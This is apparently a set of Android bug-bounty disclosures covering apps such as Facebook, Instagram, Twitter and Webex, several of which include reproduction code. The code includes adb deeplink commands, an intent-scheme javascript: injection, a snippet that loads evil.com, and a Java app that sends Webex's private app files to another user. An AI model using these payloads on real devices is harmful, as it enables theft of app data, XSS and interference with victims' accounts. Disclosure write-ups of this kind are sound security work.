Description: Samsung Knox is a defensive mobile security platform that is built into Samsung devices and enhances security in all directions through a combination of physical means and software systems, providing security protection from the hardware to the application layer.
I used the path and file structure to bypass Samsung Knox protection in an unauthorized manner to read the stored files in the secure folder, and received a Samsung $3750 reward.
Summary: com.twitter.android.lite.TwitterLiteActivity was set to exported, data passed to intent was not validated and its web view has JSInterface that available to any URL which was loaded through this activity as well as insecure schemes like file, javascript was available through intent.
Twitter recently launched Twitter Blue for Android users, allowing them to change the app icon and undo tweets at any time. Twitter Android’s version number is 9.76.0-release.0 has implemented some deeplinks for Twitter subscription to perform direct action, and some of those deeplinks are not being validated or don’t have custom permissions set if the user has a subscription or not, so it is possible to use the change icon, custom navigation, and early access features without a subscription using the below deeplinks:
extras deeplink gives access to change icon and change custom navigation and early_access deeplink gives access to features like undo tweets with custom timing.
Steps To Reproduce:
Launch below deeplink using adb to access app change flow :
adb shell am start -d "twitter://subscriptions/settings/extras"
Launch below deeplink using adb to access undo tweet feature:
adb shell am start -d "twitter://subscriptions/settings/early_access"
Instagram vulnerability description: In the Instagram for android has messaging tool, users can change message controls to decide whether they want to receive messages from potential connections or other people from Facebook and Instagram.
Instagram’s Android app has implemented a deeplink “instagram://turn_off_message_requests” that can turn off all requests so the user won’t receive messages from anybody, and this deeplink executes headlessly so there is no UI after execution of the deeplink.
Thus, a malicious or rogue app could execute a turn-off message request deeplink without any permission, like “FB_APP_COMMUNICATION” and Attacker could have able to disabled all receiving messages of Instagram user.
In Facebook android, Ad creation deeplink “ads_lwi_coupon_interstitial” has the parameter “landing_page” and uri passed to this param was not being validated so any internal/tightened deeplink passed to it could be launch on “Get Started” button pressed on UI.
Create intent using third party app or html page with deeplink “fb://ads_lwi_coupon_interstitial/?ad_account_id=1&page_id=216662095206780&landing_page=fbinternal://rninternalsettings&entry_point=home”
In Facebook android activity “com.facebook.katana.activity.iap.LaunchFromIAP” is exported with “com.facebook.katana.activity.iap” action intent filter and using “CHECKOUTURL” as Intent extra to loadUrl with validating http/https scheme, which could have potentially been used to send a malicious URL to WebView and execute xss as well as create phishing web page.
Vulnerable Facebook app version: 338.1.0.36.118
Static code analysis: In LaunchFromIAP webview url loads from bundle “A0I” which is defined in “p000X.C172877z9” as :
public static Bundle A0I(Activity activity) { return activity.getIntent().getExtras(); }
So LaunchFromIAP activity takes intent extra values and pass to bundle “A0I” and value of bundle access through A0I.getString(“CHECKOUTURL”) in LaunchFromIAP and store in “A02” as string and pass to webview defined in “p000X.C44470KuZ”.
Reproduction:
This issue could be exploited using multiple way:
1.Using any web browser :
<html>
<body>
<a href="intent:#Intent;action=com.facebook.katana.activity.iap;S.CHECKOUTURL=javascript:alert(8);end">Click here
</a>
</body>
</html>
2.Using third-party app:
2.1 : Using Action com.facebook.katana.activity.iap
Intent intent = new Intent("com.facebook.katana.activity.iap");
intent.putExtra("CHECKOUTURL", "https://evil.com");
startActivity(intent);
07/10/2021: Bounty -> $1000 + $75 (Silver league Bonus) Comment by Facebook : “An untrusted Intent containing a Javascript: URL can cause XSS in LaunchFromIAP. The instance of this bug occurs due to not checking if the scheme is http(s). The larger root cause is that SecureWebView should not by-default handle javascript: URLs in loadURL.”
03/11/2021: Fixed in v342 (It is now validate http/https scheme, host facebook.com and path “/aas/iap_web”
04/01/2022: Requested for disclosure and facebook agreed for disclosure
Facebook Linked Publications ( Authorship or Author Tag ) feature was designed to give journalists more credit and visibility for the articles they were writing, regardless of where they were being published and it resulted in the byline that you saw in many posts, as well as the ability to easily follow that journalist and see when they shared new articles publicly.
A vulnerability in Cisco Webex Teams Mobile (Android) application could allow a local attacker to access to non-sensitive information from an authenticated Webex Teams Mobile user.
The vulnerability is due to improper access handling in the affected software. An attacker could exploit this vulnerability by leveraging the improper access handling through a 3rd party application on an affected device. A successful exploit could allow the attacker to share non-sensitive information to any Webex Spaces the authenticated Webex Teams Mobile (Android) user has access.
Affected Version: This vulnerability affected Cisco Webex Teams Mobile (Android) releases earlier than Release 41.5.1.
The Cisco PSIRT has assigned this bug the following CVSS version 3.1 score. The Base CVSS score as of the time of evaluation is 3.3
Webex teams app has exported com.webex.teams.crosslaunch.message activity and it has associated with sharing fragment to share content with space or one2one using some parameters and action like android.intent.extra.STREAM and android.intent.action.SEND.
So any third-party app could have used those params to perform sharing content because app was failed to validate path and file before sharing content for permission.
Step to reproduce:
Create android app using below code snippet:
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.StrictMode;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();
StrictMode.setVmPolicy(builder.build());
Uri uri = Uri.parse("file:///data/data/com.cisco.wx2.android/shared_prefs/com.cisco.wx2.android_preferences.xml");
Intent intent = new Intent("android.intent.action.SEND");
intent.setClassName("com.cisco.wx2.android", "com.webex.teams.crosslaunch.message");
intent.putExtra("android.intent.extra.STREAM", uri);
intent.setType("");
startActivity(intent);
}
}
Once created run this app on the device where webex teams installed.
Run the created app then it will open Webex Teams app with Messaging window to select target, now select target user, here app will attach com.cisco.wx2.android_preferences.xml file to be send.
Click on send button, it will send attached internal file to target user, this also allows access to data/data/com.cisco.wx2.android/* so all files in apps data including databases could be steal.
Note: This vulnerability requires a user to be logged into the Teams app and only non-sensitive info (some app, OS settings, and cached images) can be shared to other Webex spaces. All sensitive information is encrypted, So no CVE was assigned.
Instagram for android does not handle some CYRILLIC letters like U+043E : CYRILLIC SMALL LETTER O so if we create hostname using Cyrillic small letter о like the it could crash instagram:
http://gооgle.com/
copy above url and post this url in instagram profile or send it to user in chat .
XSS vulnerability found in Koo App: Koo is a Bengaluru-based microblogging mobile application with 5 million users which is known to be an Indian alternative to Twitter. Koo app allows users to connect, engage and interact in 13 regional languages such as Bengali, Telugu, Punjabi, Kannada, Hindi among several others. The application was an instant hit because of its vast language options as untapped user base in India which is not English speaking or want a platform to engage in their local language, has a lot of potential.
Description: Stored XSS, also known as persistent XSS is more damaging than non-persistent XSS. It occurs when a malicious script is injected directly into a vulnerable web application.
Facebook Messenger for Android reuses the Thread ID when invoked via deeplink which could have led attacker to produce indirect thread deletion vulnerability.
This can lead to some confusing behaviour on the user-side, one example being: The user has a 1:1 with the attacker. The attacker then forces the user to create a new Group Chat with the same Thread ID that is not functional. If the user deletes the chat, the original chat with the attacker also disappears.
So attacker could use this method to delete thread between victim and his friend as well as delete chats from victims messenger as victim not able to left duplicate group thread so he has only option to delete conversation.
Deeplink used : fb-messenger://groupthreadfbid/%sFor automatic redirection using webpage :
Repro steps :
Messenger App version (Android) : 274.0.0.18.120
create webpage with script (replace userID with your userID) , host it:
1. Send Crafted webpage link created from script to user with whom you previously interacted.
2. On victims phone click on that link, it will open blank page and redirect back to thread
3. Send message to victim or when victim close app and reopen, duplicate thread id will be created between you and victim in victims phone.
4. Now if victim sends a message then it will shows in both thread.
5. Victim goes to duplicate thread(group thread) and tab on members and tab on admin, here he can see No admin.
6. Now if he try to left that group, he will get error so victim have only one option left with him that delete duplicate thread which is group thread.
7. Once victim Deletes duplicate thread by selecting “delete conversation” and then original thread also got deleted, this deletion is permanent as from thread would not visible in web after deletion.
Google Photos android app’s activity com.google.android.apps.photos.pager.HostPhotoPagerActivity has set to exported with intent filter has file scheme support which means third party app could use this exported activity to pass file from file uri without access validation.